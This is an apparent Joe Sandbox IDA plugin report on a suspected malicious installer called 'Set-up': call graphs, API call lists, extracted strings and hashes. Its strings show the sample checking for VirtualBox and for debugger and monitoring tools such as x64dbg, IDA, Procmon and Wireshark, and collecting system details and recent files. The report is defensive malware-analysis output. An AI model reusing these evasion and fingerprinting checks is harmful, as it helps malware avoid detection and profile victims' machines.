85990->85991 85992 9bb320 free _strdup free free free 85991->85992 85993 512e5b 85992->85993 85994 9bb290 strlen 85993->85994 85995 512ef7 85994->85995 85996 9bb320 free _strdup free free free 85995->85996 85997 512f0e 85996->85997 85999 6ecbc0 86000 6ecbce free 85999->86000 86001 6ecbcc 85999->86001 86001->86000 86002 52d5e0 86003 52d652 WSAStartup 86002->86003 86004 52d5f0 86002->86004 86005 52d670 86003->86005 86006 52d664 86003->86006 86014 52d690 91 API calls 86004->86014 86005->86004 86008 52d67c WSACleanup 86005->86008 86009 52d5fa 86010 52d606 GetProcAddress 86009->86010 86011 52d616 86009->86011 86010->86011 86015 537620 11 API calls 86011->86015 86013 52d636 QueryPerformanceFrequency 86014->86009 86015->86013 86016 5c4720 86017 5c4728 86016->86017 86018 5c4733 86017->86018 86019 5c4fe0 memset 86017->86019 86020 5c4745 86019->86020 86021 5c477d 86020->86021 86049 5d85e0 memset InitializeCriticalSection InitializeConditionVariable DeleteCriticalSection 86020->86049 86023 5c4765 86024 5c476c 86023->86024 86050 5d8a80 7 API calls 86023->86050 86046 5c4878 86024->86046 86076 5c30a0 24 API calls 86024->86076 86027 5c4791 86027->86024 86051 5ced80 memset 86027->86051 86028 5c4774 86030 5c47b0 86030->86024 86031 5ce730 memset 86030->86031 86032 5c47c4 86031->86032 86032->86024 86052 5ce530 memset _time64 86032->86052 86034 5c47d8 86034->86024 86053 5ced80 memset 86034->86053 86036 5c47f7 86036->86024 86054 5ce000 memset _time64 86036->86054 86038 5c480f 86038->86024 86055 5c5540 memset 86038->86055 86040 5c482e 86040->86024 86056 5c7720 memset memset memset _time64 86040->86056 86042 5c484f 86042->86024 86057 5c9270 86042->86057 86044 5c4860 86066 5c4950 86044->86066 86047 5c486a 86047->86024 86047->86046 86077 5cf5f0 15 API calls 86047->86077 86049->86023 86050->86027 86051->86030 86052->86034 86053->86036 86054->86038 86055->86040 86056->86042 86078 5ca440 86057->86078 86059 5c9297 86061 5c92ab 86059->86061 86151 5d86d0 EnterCriticalSection 86059->86151 86061->86044 86062 5c92f3 86064 5c93d5 86062->86064 86065 5c93b1 memcpy 86062->86065 86152 5d86f0 LeaveCriticalSection 86064->86152 86065->86064 86067 5c4966 86066->86067 86068 5c4a14 htonl 86067->86068 86071 5c49b9 86067->86071 86075 5c49c5 86067->86075 86160 5cb590 memset atoi if_nametoindex if_indextoname 86068->86160 86070 5c4aa0 gethostname 86072 5c4b35 strchr 86070->86072 86073 5c4ab3 WSAGetLastError 86070->86073 86071->86070 86071->86075 86072->86075 86073->86071 86073->86072 86075->86047 86076->86028 86077->86024 86079 5ca46b 86078->86079 86082 5ca48b GetAdaptersAddresses 86079->86082 86088 5ca4db 86079->86088 86081 5ca9fa 86083 5caa03 RegOpenKeyExA 86081->86083 86108 5cad14 86081->86108 86110 5ca4a6 86082->86110 86138 5ca53f 86082->86138 86084 5caa27 RegQueryValueExA 86083->86084 86085 5cab70 RegOpenKeyExA 86083->86085 86086 5caacc RegQueryValueExA 86084->86086 86087 5caa71 86084->86087 86089 5cac34 RegOpenKeyExA 86085->86089 86090 5cab90 RegQueryValueExA 86085->86090 86095 5cab0e 86086->86095 86096 5cab66 RegCloseKey 86086->86096 86087->86086 86102 5caa85 RegQueryValueExA 86087->86102 86088->86108 86153 5dcb10 GetVersionExA 86088->86153 86091 5cacf8 RegOpenKeyExA 86089->86091 86092 5cac54 RegQueryValueExA 86089->86092 86093 5cac26 RegCloseKey 86090->86093 86094 5cabd2 86090->86094 86100 5cad56 RegEnumKeyExA 86091->86100 86091->86108 86097 5cacea RegCloseKey 86092->86097 86098 5cac96 86092->86098 86093->86089 86094->86093 86111 5cabe2 RegQueryValueExA 86094->86111 86095->86096 86107 5cab1e RegQueryValueExA 86095->86107 86096->86085 86097->86091 86098->86097 86112 5caca6 RegQueryValueExA 86098->86112 86099 5ca87d qsort 86099->86088 86140 5ca8a0 86099->86140 86103 5cb15d RegCloseKey 86100->86103 86104 5cad9b 86100->86104 86101 5ca4f3 GetAdaptersAddresses 86105 5ca505 86101->86105 86101->86138 86106 5caab3 86102->86106 86103->86108 86109 5cae16 RegOpenKeyExA 86104->86109 86105->86088 86113 5ca527 GetAdaptersAddresses 86105->86113 86106->86086 86114 5cab4c 86107->86114 86115 5cab5b 86107->86115 86108->86059 86118 5caddf RegEnumKeyExA 86109->86118 86119 5cae34 RegQueryValueExA 86109->86119 86110->86088 86110->86101 86116 5cac0c 86111->86116 86117 5cac1b 86111->86117 86120 5cacdf 86112->86120 86121 5cacd0 86112->86121 86113->86088 86113->86138 86157 5cb1e0 strlen strncat 86114->86157 86115->86096 86158 5cb1e0 strlen strncat 86116->86158 86117->86093 86118->86109 86125 5cb155 86118->86125 86126 5caf43 RegQueryValueExA 86119->86126 86144 5cadbc 86119->86144 86120->86097 86159 5cb1e0 strlen strncat 86121->86159 86123 5ca8f0 strcmp 86123->86140 86125->86103 86128 5cb052 RegQueryValueExA 86126->86128 86126->86144 86130 5cadc7 RegCloseKey 86128->86130 86128->86144 86129 5ca794 GetBestRoute2 86131 5cd190 SetLastError 86129->86131 86130->86118 86131->86138 86132 5cae91 RegQueryValueExA 86132->86144 86133 5cafa0 RegQueryValueExA 86133->86144 86134 5ca6c7 GetBestRoute2 86137 5cd190 SetLastError 86134->86137 86135 5ca81e htons 86135->86138 86136 5cb0af RegQueryValueExA 86136->86144 86137->86138 86138->86088 86138->86099 86138->86129 86138->86134 86138->86135 86139 5ca746 htons 86138->86139 86141 5cb180 29 API calls 86138->86141 86139->86138 86140->86088 86140->86123 86142 5ca8b0 strncat 86140->86142 86143 5ca991 strlen 86140->86143 86141->86138 86142->86140 86143->86142 86144->86126 86144->86128 86144->86130 86144->86132 86144->86133 86144->86136 86145 5caf26 strncat 86144->86145 86146 5caf17 strlen 86144->86146 86147 5cb035 strncat 86144->86147 86148 5cb026 strlen 86144->86148 86149 5cadaa strncat 86144->86149 86150 5cb141 strlen 86144->86150 86145->86144 86146->86145 86147->86144 86148->86147 86149->86144 86150->86149 86151->86062 86152->86061 86154 5dcbbb 86153->86154 86155 5dcb6a GetVersionExA 86153->86155 86154->86081 86155->86154 86156 5dcbd2 86155->86156 86156->86081 86157->86115 86158->86117 86159->86120 86160->86071 86161 5c70a0 86169 5c70ae 86161->86169 86162 5c717f WSAGetLastError 86163 5c718b 86162->86163 86165 5c71a7 86163->86165 86175 5c6d50 7 API calls 86163->86175 86167 5c719f 86176 5d9320 86167->86176 86169->86162 86169->86165 86171 5da8c0 86169->86171 86182 5c71c0 28 API calls 86169->86182 86172 5da8e6 86171->86172 86173 5da903 recvfrom 86171->86173 86172->86173 86174 5da8ed 86172->86174 86173->86174 86174->86169 86175->86167 86178 5d9345 86176->86178 86177 5d88b0 2 API calls 86179 5d93af 86177->86179 86178->86177 86183 5db020 86179->86183 86181 5d9422 86181->86165 86182->86169 86184 5db052 86183->86184 86186 5db029 86183->86186 86184->86181 86185 5db04b closesocket 86185->86184 86186->86185 86187 5db03e 86186->86187 86187->86181 86188 5da920 86189 5da944 86188->86189 86190 5da977 send 86189->86190 86191 5da94b 86189->86191
                                      APIs
                                        • Part of subcall function 0052D8C0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,00000000,?,0000001C,?,005201B1), ref: 0052D8E2
                                      • setsockopt.WS2_32(?,00000029,0000001B,00000000,00000004), ref: 0054A670
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0054A6A1
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0054A6AB
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0054A6AF
                                        • Part of subcall function 0052D090: GetLastError.KERNEL32 ref: 0052D0A1
                                        • Part of subcall function 0052D090: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0052D0A9
                                        • Part of subcall function 0052D090: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0052D0CD
                                        • Part of subcall function 0052D090: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0052D0D7
                                        • Part of subcall function 0052D090: strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000000A), ref: 0052D381
                                        • Part of subcall function 0052D090: strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000000D), ref: 0052D3A2
                                        • Part of subcall function 0052D090: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0052D3BF
                                        • Part of subcall function 0052D090: GetLastError.KERNEL32 ref: 0052D3C9
                                        • Part of subcall function 0052D090: SetLastError.KERNEL32(00000000), ref: 0052D3D4
                                        • Part of subcall function 00554F40: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 00554F9E
                                      • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 0054A831
                                      • WSAGetLastError.WS2_32 ref: 0054A854
                                      • getsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004), ref: 0054A97A
                                      • setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 0054A9A6
                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0054AB0F
                                      • htons.WS2_32(?), ref: 0054AC01
                                      • getsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004), ref: 0054AC38
                                      • setsockopt.WS2_32(?,0000FFFF,00001001,00004020,00000004), ref: 0054AC64
                                      • WSAGetLastError.WS2_32 ref: 0054ACDC
                                      • WSAGetLastError.WS2_32 ref: 0054ADF5
                                      • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000025), ref: 0054AE9D
                                      • htons.WS2_32(?), ref: 0054AEDB
                                      • bind.WS2_32(?,00000002,00000010), ref: 0054AEF5
                                      • WSAGetLastError.WS2_32 ref: 0054AFB9
                                      • htons.WS2_32(?), ref: 0054AFFC
                                      • bind.WS2_32(?,?,?), ref: 0054B014
                                      • WSAGetLastError.WS2_32 ref: 0054B056
                                      • htons.WS2_32(?), ref: 0054B0D2
                                      • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,00000000,0000000A), ref: 0054B0EA
                                      Strings
                                      • Name '%s' family %i resolved to '%s' family %i, xrefs: 0054ADAC
                                      • Local port: %hu, xrefs: 0054AF28
                                      • @, xrefs: 0054A8F4
                                      • Could not set TCP_NODELAY: %s, xrefs: 0054A871
                                      • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 0054A6CE
                                      • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 0054AD0A
                                      • cf_socket_open() -> %d, fd=%d, xrefs: 0054A796
                                      • Bind to local port %d failed, trying next, xrefs: 0054AFE5
                                      • Trying [%s]:%d..., xrefs: 0054A689
                                      • cf-socket.c, xrefs: 0054A5CD, 0054A735
                                      • Trying %s:%d..., xrefs: 0054A7C2, 0054A7DE
                                      • @, xrefs: 0054AC42
                                      • bind failed with errno %d: %s, xrefs: 0054B080
                                      • Couldn't bind to '%s' with errno %d: %s, xrefs: 0054AE1F
                                      • Local Interface %s is ip %s using address family %i, xrefs: 0054AE60
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: ErrorLast$_errno$htonssetsockopt$bindgetsockoptstrrchr$CounterPerformanceQuery__sys_errlist__sys_nerrstrchrstrcpystrlenstrtoul
                                      • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                      • API String ID: 2815861332-2373386790
                                      • Opcode ID: f28bf3c54d167b184a41a64a412a35ab45d5c77d19c3fc9026c349eaef3ab003
                                      • Instruction ID: b88b04c8887c4a24e90b2f0418f4d6c760909c73d5bf39e8be78805453bcf987
                                      • Opcode Fuzzy Hash: f28bf3c54d167b184a41a64a412a35ab45d5c77d19c3fc9026c349eaef3ab003
                                      • Instruction Fuzzy Hash: 2062F171544341ABE720CF24C84ABEBBBF4FF95318F044929F98997292E771A845CB93

                                      Control-flow Graph

                                      APIs
                                      • FindFirstFileA.KERNELBASE ref: 00512A27
                                      • RegOpenKeyExA.KERNELBASE ref: 00512A8A
                                      • CharUpperA.USER32 ref: 00512AEF
                                      • strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00512B05
                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00512B6D
                                      • Process32First.KERNEL32 ref: 00512B88
                                      • Process32Next.KERNEL32 ref: 00512BC0
                                      • QueryFullProcessImageNameA.KERNELBASE ref: 00512C26
                                      • CloseHandle.KERNELBASE ref: 00512C49
                                      • strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00512C5F
                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00512CC4
                                      • Process32First.KERNEL32 ref: 00512CDF
                                      • strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00512D0D
                                      • strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00512D42
                                      • strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00512D5C
                                      • strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00512D76
                                      • strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00512D90
                                      • Process32Next.KERNEL32 ref: 00512DBF
                                      • CloseHandle.KERNELBASE ref: 00512DFC
                                      • EnumWindows.USER32 ref: 00512E21
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: strstr$Process32$First$CloseCreateHandleNextSnapshotToolhelp32$CharEnumFileFindFullImageNameOpenProcessQueryUpperWindowsstrncpy
                                      • String ID: 0$C:\USERS\PUBLIC\$C:\Windows\System32\VBox*.dll$SYSTEM\ControlSet001\Services\VBoxSF$WINDBG.EXE$dbg$dbg_sec$dbg_third$ida.exe$procmon.exe$public_check$vbox_first$vbox_second$wireshark.exe$x64dbg.exe$yadro
                                      • API String ID: 515599682-3783588604
                                      • Opcode ID: ccbb554f86fbfa3c3e8f18c359ba2bc8bc7740f13415fe9670694773b0a21f84
                                      • Instruction ID: 35083ee77d25a777e10d2c4341db203ccc323fb4c68435dd0e5edd15b9a1291c
                                      • Opcode Fuzzy Hash: ccbb554f86fbfa3c3e8f18c359ba2bc8bc7740f13415fe9670694773b0a21f84
                                      • Instruction Fuzzy Hash: E7E1E4B49057099FDB00EFA8D9847ADBBF4BF44344F008969E988DB340E7749998CF42

                                      Control-flow Graph

                                      APIs
                                      • GetSystemInfo.KERNELBASE ref: 00512579
                                        • Part of subcall function 009BB130: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00512589), ref: 009BB145
                                      • GlobalMemoryStatusEx.KERNELBASE ref: 005125CC
                                      • GetLogicalDriveStringsA.KERNEL32 ref: 00512619
                                      • GetDriveTypeA.KERNELBASE ref: 00512647
                                      • GetDiskFreeSpaceExA.KERNELBASE ref: 0051267E
                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00512749
                                      • KiUserCallbackDispatcher.NTDLL ref: 005127E2
                                      • SHGetKnownFolderPath.SHELL32 ref: 0051286D
                                      • wcscpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 005128BE
                                      • wcscat.API-MS-WIN-CRT-STRING-L1-1-0 ref: 005128D4
                                      • FindFirstFileW.KERNELBASE ref: 005128F8
                                      • FindNextFileW.KERNELBASE ref: 0051291F
                                      • K32EnumProcesses.KERNEL32 ref: 0051296F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: DriveFileFind$CallbackDiskDispatcherEnumFirstFolderFreeGlobalInfoKnownLogicalMemoryNextPathProcessesSpaceStatusStringsSystemTypeUsermallocstrlenwcscatwcscpy
                                      • String ID: ;%Q$@$Num_displays$Num_processor$Num_ram$`$all$drivers$free$name$processes$recent_files$resolution_x$resolution_y$uptime_minutes
                                      • API String ID: 2116500361-1895345988
                                      • Opcode ID: f1b8b6194c9382e85d32a888df86391e18f4256f681c28f0a5c5adb612364c01
                                      • Instruction ID: 024bb2ce185ecd4068319e98a36712d3aa07818d6bbeae28980adba64a15d1fd
                                      • Opcode Fuzzy Hash: f1b8b6194c9382e85d32a888df86391e18f4256f681c28f0a5c5adb612364c01
                                      • Instruction Fuzzy Hash: F2D1A3B49057099FCB00EFA8C98579EBBF0BF84354F008969E898D7351E7749A84CF92

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 930 5daa30-5daa64 932 5daa6a-5daaa7 call 5ce730 930->932 933 5dab04-5dab09 930->933 937 5dab0e-5dab13 932->937 938 5daaa9-5daabd 932->938 935 5dae80-5dae89 933->935 939 5dae2e 937->939 940 5daabf-5daac7 938->940 941 5dab18-5dab50 htons 938->941 943 5dae30-5dae4a call 5cea60 call 5cebf0 939->943 940->939 944 5daacd-5dab02 htons 940->944 942 5dab58-5dab6d 941->942 945 5dab6f-5dab73 942->945 946 5dab96-5dabab socket 942->946 960 5dae4c-5dae57 943->960 961 5dae75-5dae7d 943->961 944->942 945->946 948 5dab75-5dab8f 945->948 946->939 950 5dabb1-5dabc5 946->950 948->950 959 5dab91 948->959 952 5dabc7-5dabca 950->952 953 5dabd0-5dabed ioctlsocket 950->953 952->953 956 5dad2e-5dad39 952->956 957 5dabef-5dac0a setsockopt 953->957 958 5dac10-5dac14 953->958 962 5dad3b-5dad4c 956->962 963 5dad52-5dad56 956->963 957->958 964 5dae29 957->964 965 5dac37-5dac41 958->965 966 5dac16-5dac31 setsockopt 958->966 959->939 967 5dae6e-5dae6f closesocket 960->967 968 5dae59-5dae5e 960->968 961->935 962->963 962->964 963->964 969 5dad5c-5dad6b 963->969 964->939 970 5dac7a-5dac7e 965->970 971 5dac43-5dac46 965->971 966->964 966->965 967->961 968->967 978 5dae60-5dae6c 968->978 972 5dad70-5dad78 969->972 976 5dace7-5dacfe setsockopt 970->976 977 5dac80-5dac9b 970->977 973 5dac4c-5dac51 971->973 974 5dad04-5dad08 971->974 980 5dad7a-5dad7f 972->980 981 5dada0-5dadad connect 972->981 973->974 982 5dac57-5dac78 htonl 973->982 974->956 984 5dad0a-5dad28 setsockopt 974->984 976->974 977->976 983 5dac9d-5dacc1 977->983 978->961 980->981 985 5dad81-5dad99 980->985 987 5dadb3-5dadcf WSAGetLastError 981->987 986 5dacc6-5dacd7 bind 982->986 983->986 984->956 984->964 985->987 986->964 989 5dacdd-5dace5 986->989 990 5dae8a-5dae91 987->990 991 5dadd5-5dadd8 987->991 989->974 989->976 990->943 993 5dadda-5daddf 991->993 994 5dade1-5dadf1 991->994 993->972 993->994 995 5dae0d-5dae12 994->995 996 5dadf3-5dae07 994->996 997 5dae1a-5dae1c call 5daf70 995->997 998 5dae14-5dae17 995->998 996->995 1002 5daea8-5daead 996->1002 1001 5dae21-5dae23 997->1001 998->997 1003 5dae25-5dae27 1001->1003 1004 5dae93-5dae9d 1001->1004 1002->943 1003->943 1005 5daeaf-5daeb1 call 5ce760 1004->1005 1006 5dae9f-5daea6 call 5ce7c0 1004->1006 1010 5daeb6-5daebe 1005->1010 1006->1010 1011 5daf1a-5daf1f 1010->1011 1012 5daec0-5daedb call 5ce180 1010->1012 1011->943 1012->943 1015 5daee1-5daeec 1012->1015 1016 5daeee-5daeff 1015->1016 1017 5daf02-5daf06 1015->1017 1016->1017 1018 5daf0e-5daf15 1017->1018 1019 5daf08-5daf0b 1017->1019 1018->935 1019->1018
                                      APIs
                                      • htons.WS2_32(?), ref: 005DAAE8
                                      • htons.WS2_32(?), ref: 005DAB33
                                      • socket.WS2_32(FFFFFFFF,?,00000000), ref: 005DAB9A
                                      • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 005DABE3
                                      • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004), ref: 005DAC02
                                      • setsockopt.WS2_32(?,0000FFFF,00001002,00000000,00000004), ref: 005DAC29
                                      • htonl.WS2_32(00000000), ref: 005DAC69
                                      • bind.WS2_32(?,00000017,0000001C), ref: 005DACCF
                                      • setsockopt.WS2_32(?,00000029,0000001B,0000001C,00000004), ref: 005DACFE
                                      • setsockopt.WS2_32(?,00000006,00000001,0000001C,00000004), ref: 005DAD20
                                      • WSAGetLastError.WS2_32 ref: 005DADB5
                                      • closesocket.WS2_32(?), ref: 005DAE6F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: setsockopt$htons$ErrorLastbindclosesockethtonlioctlsocketsocket
                                      • String ID:
                                      • API String ID: 4039825230-0
                                      • Opcode ID: e84ff0cff3db9261756509685e51a0449421e0c05721c21774e0d20171478a58
                                      • Instruction ID: 25fef0076d495f7c34cf2a7de105389f99a05121de04a4c3a81f3d11bac64ab7
                                      • Opcode Fuzzy Hash: e84ff0cff3db9261756509685e51a0449421e0c05721c21774e0d20171478a58
                                      • Instruction Fuzzy Hash: F1E17C746003019FE7208F28C845B6BBBA5FF89314F144A2EF9999B3A1E775D944CB92

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1021 51116c-51118a 1022 511430-511439 GetStartupInfoA 1021->1022 1023 511190-5111a1 1021->1023 1027 511448-51145d _cexit 1022->1027 1024 5111bc-5111c8 1023->1024 1025 5111a8-5111aa 1024->1025 1026 5111ca-5111d4 1024->1026 1028 5113d0-5113dd 1025->1028 1029 5111b0-5111b9 Sleep 1025->1029 1030 5113e3-5113f7 call 898a20 1026->1030 1031 5111da-5111e1 1026->1031 1028->1030 1028->1031 1029->1024 1035 5113fd-51141d _initterm 1030->1035 1036 5111ff-511201 1030->1036 1032 511460-511479 _initterm 1031->1032 1033 5111e7-5111f9 1031->1033 1038 511483 1032->1038 1033->1035 1033->1036 1039 511423-511429 1035->1039 1040 511207-51120e 1035->1040 1036->1039 1036->1040 1043 51148a-511499 exit 1038->1043 1039->1040 1041 511210-511229 1040->1041 1042 51122c-51126c call 8993e0 SetUnhandledExceptionFilter _set_invalid_parameter_handler call 899210 __p__acmdln 1040->1042 1041->1042 1049 511281-511287 1042->1049 1050 51126e 1042->1050 1052 511270-511272 1049->1052 1053 511289-511294 1049->1053 1051 5112bd-5112c5 1050->1051 1056 5112c7-5112d0 1051->1056 1057 5112db-5112fa malloc 1051->1057 1054 511274-511277 1052->1054 1055 5112b8 1052->1055 1058 51127e 1053->1058 1059 5112a0-5112a2 1054->1059 1060 511279 1054->1060 1055->1051 1061 5113c0-5113c4 1056->1061 1062 5112d6 1056->1062 1057->1038 1063 511300-511311 1057->1063 1058->1049 1059->1055 1064 5112a4 1059->1064 1060->1058 1061->1062 1062->1057 1065 511318-51134c strlen malloc memcpy 1063->1065 1066 5112a8-5112b1 1064->1066 1065->1065 1067 51134e-51139b call 899060 call 9c0a80 1065->1067 1066->1055 1068 5112b3-5112b6 1066->1068 1067->1043 1073 5113a1-5113a9 1067->1073 1068->1055 1068->1066 1073->1027 1074 5113af-5113ba 1073->1074
                                      APIs
                                      • Sleep.KERNEL32 ref: 005111B7
                                      • SetUnhandledExceptionFilter.KERNEL32 ref: 00511238
                                      • _set_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0051124D
                                      • __p__acmdln.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00511261
